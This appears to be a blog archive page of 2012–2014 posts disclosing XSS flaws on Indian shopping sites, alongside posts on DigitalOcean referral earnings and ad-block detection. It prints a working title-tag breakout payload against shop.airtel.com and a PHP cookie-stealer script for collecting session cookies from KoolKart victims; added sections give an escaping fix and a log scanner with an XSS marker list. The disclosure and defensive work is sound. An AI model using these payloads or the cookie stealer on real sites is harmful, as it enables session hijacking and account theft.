
Hey Snapdeal – You’ve got a XSS vulnerability [Fixed]

April 10, 2014 at 10:50 pm

Update: Got a mail from snapdeal security team, and this vulnerability has been fixed.
I just found an XSS vulnerability on a very popular Indian e-commerce site, snapdeal.com. It was a bit tricky to find the XSS pattern, because searching for a string containing some JavaScript functions such as “alert(” or “String.fromCharCode(” was throwing an “Access Denied” page. A search string containing “eval(”, though, wasn’t throwing any error.

[Screenshot: Snapdeal XSS Access-Denied]

XSS vulnerability found on shop.airtel.com

April 10, 2014 at 2:36 am

I was randomly browsing through shop.airtel.com and discovered an XSS vulnerability. This involves one of the simplest forms of XSS attack, known as the end-title-tag attack. This vulnerability is present in web pages where the search string is put directly between the title tags without sanitizing it.

So simply closing the title tag and putting a script tag after it does the trick. I searched for the following in the search box on shop.airtel.com:

</TITLE><SCRIPT>alert("XSS ;-)");</SCRIPT>

And there it was, the alert dialog box!!! (see screenshot below)

Note: This type of vulnerability is blocked by Google Chrome’s XSS Auditor, so use Firefox to test it.

[Screenshot: airtel-xss]
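As an added example (not code from the post or from shop.airtel.com), the snippet below shows the title-reflection bug next to its fix. The server-side code that rendered the Airtel page is not known, so the two render functions are hypothetical stand-ins: one drops the search string straight between the title tags, the other HTML-encodes it first with Python's html.escape. The third function is the regression check a site owner would keep: request the page with the probe string from the post and confirm it no longer comes back verbatim.

```python
import html

# The probe string from the post above: closes <title> and opens a script element.
PAYLOAD = '</TITLE><SCRIPT>alert("XSS ;-)");</SCRIPT>'


def render_title_vulnerable(query: str) -> str:
    """Hypothetical vulnerable page: the search string is reflected into <title> unchanged."""
    return (
        "<html><head><title>Search results for " + query + "</title></head>"
        "<body></body></html>"
    )


def render_title_safe(query: str) -> str:
    """Same page with the fix: HTML-encode the string before reflecting it.

    <title> is an RCDATA element, so the only way out of it is a literal
    "</title" sequence. Encoding "<" as "&lt;" (html.escape also encodes
    ">", "&" and both quote characters) means the browser shows the text
    but never sees a closing tag or a <script> element.
    """
    return (
        "<html><head><title>Search results for "
        + html.escape(query, quote=True)
        + "</title></head><body></body></html>"
    )


def reflects_unescaped(page: str, probe: str) -> bool:
    """Regression check: True if the probe survives verbatim in the response,
    i.e. the title context can still be broken out of."""
    return probe in page


if __name__ == "__main__":
    vulnerable = render_title_vulnerable(PAYLOAD)
    safe = render_title_safe(PAYLOAD)
    print("vulnerable page reflects probe:", reflects_unescaped(vulnerable, PAYLOAD))
    print("hardened page reflects probe:  ", reflects_unescaped(safe, PAYLOAD))
    print(safe)
```

The same encode-on-output rule applies to every HTML context the search string is echoed into (the results heading, the "you searched for" box, input values), not just the title; the check function is the part worth wiring into a test suite so the fix cannot silently regress.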

DigitalOcean + Black Friday Promo Code + Hacker News = $4000 in referral fees

March 21, 2014 at 1:55 pm

On the occasion of Black Friday, DigitalOcean offered $50 in credits (equivalent to 10 months of the 512MB VPS plan for free).

[Image: DigitalOcean Black Friday tweet]

I was already a customer of DigitalOcean, so I shared this offer on Hacker News. The post got 29 upvotes and 32 comments and made it to the second page of Hacker News. I got around 400 referrals and made $4000 that day (most of the referrals were from Hacker News).

Awesome!!! Isn’t it? But there’s a catch. I make $10 for each signup only when the referred customer adds $10 to his account via credit card or PayPal. See the screenshot of my earnings below. Most of the money is still pending, and I hope that when the free credits run out, people will actually pay for their VPS and I’ll get paid in return.

[Screenshot: digitalocean-referral-income]

I can only imagine how many signups this promotion must have driven, and how much it contributed to the meteoric rise of DigitalOcean. I love DigitalOcean, but they aren’t offering any coupon code right now. One of the main reasons I tried them was the promo code that gave me 2 months of free hosting.

If you are interested in getting a VPS from DigitalOcean, click here. Use Promo Code: DEPLOY2DO to get free $10 credit.

Disclaimer: All the links to digitalocean have my referral code.

Simple way to detect ad blocking extensions/addons (and monetizing without ads)

October 5, 2013 at 3:56 am

Lately, I’ve seen a lot of people using ad-blocking extensions/addons to block ads on websites. Such extensions/addons reduce the clutter a bit and hence provide a better browsing experience for the user. But on the other hand, many sites depend solely on ad revenue to keep running.

In order to fix this problem, I quickly hacked a very tiny script which detects ad blocking extensions/addons. I’ve tested the script with AdBlock and AdBlock Plus extensions and it worked fine.

Here are the steps to detect ad blocking extensions/addons:

Popular (and not so popular) Indian E-commerce websites with XSS vulnerabilities

August 21, 2013 at 12:38 am

I was going through a few Indian e-commerce websites and found XSS vulnerabilities in a few of them. I’m not publishing the injection patterns for security reasons. If anyone from the companies listed below wants to know the injection pattern for their respective website, get in touch. Below is the list of vulnerable websites:

Find the screenshots for all the sites listed above (click to enlarge) :

KoolKart.com, get Kooler by sanitizing your input

October 28, 2012 at 3:50 pm

Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed), and now I’ll demo an XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a PHP script for saving the cookie returned by the injected code (cookie-stealer.php).

<?php
// Read the "cookie" parameter sent by the injected script and drop surrounding whitespace.
$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
if(!empty($str)){
    // Append a timestamped line to the text file.
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    // Send the browser back to the site so nothing looks out of place.
    header('Location: http://www.koolkart.com/');
}

The code is self-explanatory. It gets the cookie information via the query string, saves it to a text file and redirects back to KoolKart.
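Seen from the site operator's side, the request that the injected script makes to cookie-stealer.php lands in the attacker's log, not the site's own, so the defences that matter are output encoding (as in the Airtel post), the HttpOnly flag on the session cookie so script cannot read it at all, and spotting probe traffic in the site's own access log before someone gets that far. The block below is an added example (not code from this post, KoolKart or Snapdeal) of that last piece: it parses constructed combined-format access-log lines, percent-decodes every query parameter, and flags values that carry tag breakouts or the function names from the Snapdeal post. It covers both that post and this one: note that Snapdeal's filter let “eval(” through while blocking “alert(”, which is exactly why this list includes it and why a denylist is monitoring, not a fix. Log format, field names and the IP addresses are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markers taken from the posts above: tag breakouts plus the functions the Snapdeal
# filter blocked ("alert(", "String.fromCharCode(") and the one it let through ("eval(").
# Values are lower-cased before matching, so the markers are written in lower case.
XSS_MARKERS = (
    "<script", "</title", "javascript:", "onerror=", "onload=",
    "alert(", "string.fromcharcode(", "eval(",
)

# Constructed sample log in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2014:02:36:01 +0530] "GET /search?q=nokia+lumia HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2014:02:36:40 +0530] "GET /search?q=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS+%3B-%29%22%29%3B%3C%2FSCRIPT%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2014:22:50:12 +0530] "GET /search?keyword=%22%3E%3Cscript%3Eeval%28name%29%3C%2Fscript%3E HTTP/1.1" 200 4877 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def decode_query(target: str) -> dict:
    """Return {param: [values]} for the request target, percent-decoded.

    parse_qs already decodes once; the extra unquote_plus pass normalises
    double-encoded probes (%253C -> %3C -> <) that a single decode would miss.
    """
    query = urlsplit(target).query
    decoded = parse_qs(query, keep_blank_values=True)
    return {k: [unquote_plus(v) for v in vals] for k, vals in decoded.items()}


def find_xss_markers(value: str) -> list:
    """List the markers present in a decoded parameter value (case-insensitive)."""
    lowered = value.lower()
    return [m for m in XSS_MARKERS if m in lowered]


def scan_log(log_text: str) -> list:
    """Parse each line and report every parameter value carrying an XSS marker."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for param, values in decode_query(m["target"]).items():
            for value in values:
                markers = find_xss_markers(value)
                if markers:
                    hits.append({
                        "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                        "param": param, "markers": markers, "value": value,
                    })
    return hits


def probes_by_ip(hits: list) -> Counter:
    """Count flagged requests per source address for triage."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["param"], h["markers"], repr(h["value"]))
    print(probes_by_ip(scan_log(SAMPLE_LOG)))
```

Because the check runs on decoded values rather than the raw query string, the URL-encoded form of the Airtel probe is caught the same way as the plain one; a 200 status on a flagged request is the line worth looking at first, since it means the page rendered the probe rather than rejecting it.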

DealsAndYou, why you no sanitize inputs?

October 24, 2012 at 11:44 pm
[Image: Dealsandyou.com, Y U NO sanitize input]

Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.

[Screenshot: dealsandyouthanks]

I was looking at dealsandyou.com a couple of days back and something (maybe their bad design) made me do an XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila! An alert box popped up, confirming my hunch.